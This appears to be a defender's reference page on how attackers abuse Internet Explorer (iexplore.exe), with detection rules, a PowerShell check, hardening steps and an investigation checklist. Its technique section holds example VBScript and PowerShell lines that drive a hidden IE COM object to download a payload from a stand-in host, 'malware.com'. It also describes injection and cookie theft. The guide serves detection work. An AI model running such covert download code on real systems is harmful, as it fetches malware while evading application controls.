I
Critical RiskWindowsLegitimateCommonly Abusediexplore.exeWEB BROWSERiexplore.exe - Internet Explorer Security Analysis
iexplore.exe is Microsoft Internet Explorer, a legacy browser officially retired but still present on Windows systems. IE's legacy COM interfaces and poor security model make it a favorite target for malware. Attackers abuse iexplore.exe for COM-based downloads, process injection, and leveraging its trusted status to bypass application controls.
Risk Summary
CRITICAL priority for SOC triage. iexplore.exe is deprecated but still exploited. Its presence in modern attack chains usually indicates **malicious activity**. Monitor for unexpected launches, especially from cmd.exe/powershell.exe, and its use for downloading files via COM automation.
Overview
What is iexplore.exe?
iexplore.exe is Microsoft Internet Explorer, a legacy web browser that has been officially retired.
History
- Retirement: June 2022 (Win 10), earlier for Win 11
- Still Present: Exists on Windows for compatibility
- Replaced By: Microsoft Edge
Why Still Relevant
Attacker Value:
- Pre-installed on Windows
- Trusted Microsoft binary
- COM automation capabilities
- Legacy vulnerabilities
Security Significance
- Deprecated Security: No longer receiving full updates
- COM Exploitation: Heavily abused for downloads
- Process Injection Target: Common injection host
- Application Control Bypass: Trusted binary status
Normal Behavior
Normal Behavior
Expected Process State
| Property | Expected Value |
|---|---|
| Path | C:\Program Files\Internet Explorer\iexplore.exe |
| Parent | explorer.exe (rare, legitimate) |
| Instances | Usually 0 (deprecated) |
| User | Logged-in user |
| Network | Should be rare/none |
Modern Reality
In modern environments, iexplore.exe running is unusual and warrants investigation.
⚠️ iexplore.exe activity in 2024+ is suspicious by default
Legacy Process Model
iexplore.exe (frame process)
└── iexplore.exe (tab process, optional)
Common Locations
C:\Program Files\Internet Explorer\iexplore.exeC:\Program Files (x86)\Internet Explorer\iexplore.exeSuspicious Indicators
Legitimate vs Suspicious
LEGITIMATE (Rare)
Path: C:\Program Files\Internet Explorer\iexplore.exe
Parent: explorer.exe
User: Logged-in user
Context: Legacy application requirement
SUSPICIOUS (Common)
Path: C:\Temp\iexplore.exe
Parent: cmd.exe, powershell.exe, wscript.exe
User: SYSTEM (unexpected)
Context: No business justification for IE use
Behavior: Downloading files, visiting unknown URLs
Default Assumption
| Context | Assumption | Action |
|---|---|---|
| Server | SUSPICIOUS | Investigate |
| Modern Workstation | SUSPICIOUS | Investigate |
| Legacy App Requirement | Verify | Document exception |
| Automated Launch | MALICIOUS | Contain immediately |
Abuse Techniques
Attack Techniques
Technique #1: COM-Based Download (T1105)
Malicious Download via COM:
' VBScript using IE COM object
Set ie = CreateObject("InternetExplorer.Application")
ie.Visible = False
ie.Navigate "http://malware.com/payload.exe"
Do While ie.Busy : WScript.Sleep 100 : Loop
PowerShell Variant:
$ie = New-Object -ComObject InternetExplorer.Application
$ie.Visible = $false
$ie.Navigate("http://malware.com/payload.exe")
Technique #2: Living-off-the-Land
Using IE for C2:
- Trusted binary status
- Legitimate network behavior
- Bypasses application whitelisting
Technique #3: Process Injection Target (T1055)
Malware injects into iexplore.exe because:
- Trusted process
- Expected to have network activity
- Often allowed through firewalls
Technique #4: Browser Pivoting (T1185)
Injecting into IE to:
- Steal session cookies
- Perform actions as user
- Access authenticated web applications
Detection Guidance
Detection Strategies
Priority #1: Any IE Execution (Modern Systems)
Process = "iexplore.exe"
→ ALERT: HIGH - IE deprecated, investigate
PowerShell Check:
Get-Process iexplore -ErrorAction SilentlyContinue | ForEach-Object {
Write-Warning "IE RUNNING - Investigate: PID $($_.Id)"
Get-WmiObject Win32_Process -Filter "ProcessId=$($_.Id)" |
Select-Object ProcessId, ParentProcessId, CommandLine
}
Priority #2: Automated/Script Launch
Process = "iexplore.exe" AND
Parent IN ["cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"]
→ ALERT: CRITICAL - Likely malicious
Priority #3: COM Object Creation
ScriptEngine CREATES "InternetExplorer.Application"
→ ALERT: HIGH - IE COM automation
Priority #4: Hidden Window
Process = "iexplore.exe" AND
WindowVisible = false
→ ALERT: CRITICAL - Hidden IE instance
Remediation Steps
Protection and Remediation
Defense: Disable Internet Explorer
Via DISM:
dism /online /Disable-Feature /FeatureName:Internet-Explorer-Optional-amd64 /NoRestart
Via Group Policy:
Computer Configuration → Administrative Templates →
Windows Components → Internet Explorer →
Disable Internet Explorer 11 as a standalone browser
Defense: Application Control
Block iexplore.exe execution except for documented exceptions.
If Compromise Suspected
- Terminate all iexplore.exe processes
- Identify parent process chain
- Check for downloaded files
- Review IE history/cache
- Scan for persistence mechanisms
- Check for COM object abuse
Investigation Checklist
Investigation Checklist
- Determine business justification for IE usage
- Identify parent process launching IE
- Check if window is visible or hidden
- Review command line arguments
- Examine network connections
- Check IE history and cache
- Look for downloaded files
- Scan for process injection
- Verify no scheduled tasks launching IE